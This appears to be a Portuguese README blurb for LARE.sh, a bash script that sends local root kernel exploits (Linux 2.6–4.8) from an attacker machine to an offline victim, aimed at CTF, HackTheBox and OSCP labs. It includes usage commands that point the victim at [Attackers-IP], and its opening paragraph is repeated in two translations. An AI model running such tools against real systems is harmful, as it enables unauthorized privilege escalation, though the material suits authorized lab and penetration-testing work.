
[L]ocal [A]uto [R]oot [E]xploiter é um script bash simples que ajuda você a implantar explorações de root local a partir da sua máquina atacante quando a máquina vítima não tem conectividade com a internet.
[L]ocal [A]utomático [R]oot [E]xploitador é um script bash simples que ajuda a implantar exploits de root locais a partir da sua máquina atacante quando a máquina vítima não tem conectividade com a internet.
O script é útil em um cenário onde sua máquina vítima não tem conexão com a internet (ex.) enquanto você faz pivot para redes internas ou jogando CTFs que usam VPN para se conectar aos seus laboratórios fechados (ex.) hackthebox.gr ou até mesmo nos laboratórios OSCP. O script usa exploits de root locais para Linux Kernel 2.6-4.8
Este script é inspirado pelo Nilotpal Biswas's Auto Root Exploit Tool
bash LARE.sh -a or ./LARE.sh -a
Depois de concluído, você deve copiar o script para a máquina vítima por qualquer meio (wget, ftp, curl, etc.) e executar o Exploitador localmente com o seguinte comando:
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
O script executa múltiplos exploits de kernel na máquina, o que pode resultar em instabilidade do sistema. É altamente recomendado usá-lo como último recurso e em um ambiente não produtivo.